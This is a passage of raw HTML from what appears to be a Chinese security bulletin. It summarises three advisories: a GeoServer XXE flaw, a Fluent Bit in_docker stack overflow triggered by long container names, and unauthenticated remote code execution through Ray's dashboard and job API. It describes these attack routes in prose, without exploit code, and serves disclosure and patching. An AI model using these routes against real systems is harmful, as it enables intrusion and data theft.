Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;font-size: 14px;"><span style="font-weight: bold;"><span leaf="">风险等级：<span textstyle="" style="color: rgb(255, 169, 0);">高危</span></span></span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span leaf="" mpa-font-style="md8jnd0dzic" style="font-size: 14px;"><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;text-align: left;"><span leaf=""><a href="https://github.com/geoserver/geoserver/security/advisories/GHSA-fjf5-xgmq-5525" target="_blank">https://github.com/geoserver/geoserver/security/advisories/GHSA-fjf5-xgmq-5525</a></span></span></p></li></ul><p style="text-indent: 2em;margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="mdiitmhwpo9" style="font-size: 14px;">GeoServer 是一个开源服务器，允许用户共享和编辑地理空间数据。在 2.26.0 到 2.26.2 以及 2.25.6 之前的版本中，存在一个 XML 外部实体 (XXE) 漏洞。该应用程序通过特定的端点 /geoserver/wms 的 GetMap 操作接收 XML 输入。然而，此输入未经过充分的清理或限制，攻击者可以利用此漏洞在 XML 请求中定义外部实体。</span></p><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdigjhd1sw3"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8m9hhd2a7" style="font-size: 32px;" data-mpa-action-id="md8m9hiezfc" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">02</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">Fluent Bit in_docker 缓冲区溢出漏洞</span></span></p><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">（CVE-2025-12970）</span></span></p></div></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="7 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdiitmih1vcz"><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span mpa-font-style="md8jp80j1nod" style="font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;font-size: 14px;"><span style="font-weight: bold;"><span leaf="">风险等级：<span textstyle="" style="color: rgb(255, 169, 0);">高危</span></span></span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span leaf="" mpa-font-style="md8jnd0dzic" style="font-size: 14px;"><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></p><p><span style="color: rgb(0, 82, 255);font-size: 14px;background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;"><span leaf=""><a href="https://github.com/fluent/fluent-bit/tags" target="_blank">https://github.com/fluent/fluent-bit/tags</a></span></span></p></li></ul><p style="text-indent: 2em;margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="mdiitmhwpo9" style="font-size: 14px;">Fluent Bit 被披露其存在缓冲区溢出漏洞，漏洞编号CVE-2025-12970。可导致进程崩溃或潜在的远程代码执行等危害。Fluent Bit 是一个开源的多平台日志处理器工具，用于收集、处理和发送日志数据。 据官方描述，在 Fluent Bit 的 in_docker 输入插件中，由于插件在处理容器名称的 extract_name 函数（位于 cgroup_v1.c 和 cgroup_v2.c）内，将容器名直接拷贝至一个固定 256 字节的栈缓冲区 buff 时未进行长度校验，导致攻击者可通过创建长名称容器触发栈缓冲区溢出，进而造成 Fluent Bit 代理崩溃、任意代码执行，使得攻击者可完全控制日志代理节点、篡改或窃取日志与度量数据、隐藏自身行迹并进一步横向移动。</span></p><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="9 12 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdiitmih1vcz"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdigjhd1sw3"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8m9hhd2a7" style="font-size: 32px;" data-mpa-action-id="md8m9hiezfc" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">03</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">Anyscale Ray 远程代码执行漏洞</span></span></p><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">（CVE-2025-34351）</span></span></p></div></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="7 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdiitmih1vcz"><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span mpa-font-style="md8jp80j1nod" style="font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;font-size: 14px;"><span style="font-weight: bold;"><span leaf="">风险等级：<span textstyle="" style="color: rgb(255, 76, 65);">严重</span></span></span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span leaf="" mpa-font-style="md8jnd0dzic" style="font-size: 14px;"><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></p><p><span style="color: rgb(0, 82, 255);font-size: 14px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;"><span leaf=""><a href="https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-w8vc-465m-jjw6" target="_blank">https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-w8vc-465m-jjw6</a></span></span></p><p><span style="font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;"><span leaf=""><span textstyle="" style="font-size: 14px;color: rgb(0, 82, 255);"><a href="https://docs.ray.io/en/latest/ray-security/token-auth.html" target="_blank">https://docs.ray.io/en/latest/ray-security/token-auth.html</a></span></span></span></p></li></ul><p style="text-indent: 2em;margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="mdiitmhwpo9" style="font-size: 14px;">Anyscale Ray 是一个统一分布式计算框架，其核心价值在于通过简洁的 Python API 让开发者能轻松地将人工智能与 Python 应用从单机扩展至大规模集群，而无需关注底层基础设施的复杂性。该框架基于动态任务执行引擎，统一了角色并行和任务并行计算，特别擅长管理机器学习工作流中的多节点、多 GPU 协调任务，例如大规模数据处理、分布式模型训练、超参数调优以及模型服务部署，从而显著提升了 AI 应用的开发效率和资源利用率。Anyscale Ray &lt;=2.52.0 的默认配置存在安全隐患，除非显式启用（通过设置 RAY_AUTH_MODE=token），否则 Ray 管理接口（包括仪表盘和作业 API）的基于令牌的身份验证功能将被禁用。在默认的未认证状态下，远程攻击者可以通过网络访问这些接口，从而提交作业并在 Ray 集群上执行任意代码。注意：供应商计划在未来的版本中默认启用令牌身份验证。他们建议启用令牌身份验证，以保护您的集群免受未经授权的访问。</span></p></div></div></div></div></div></div></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-mpa-action-id="mdiitmih1vcz"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 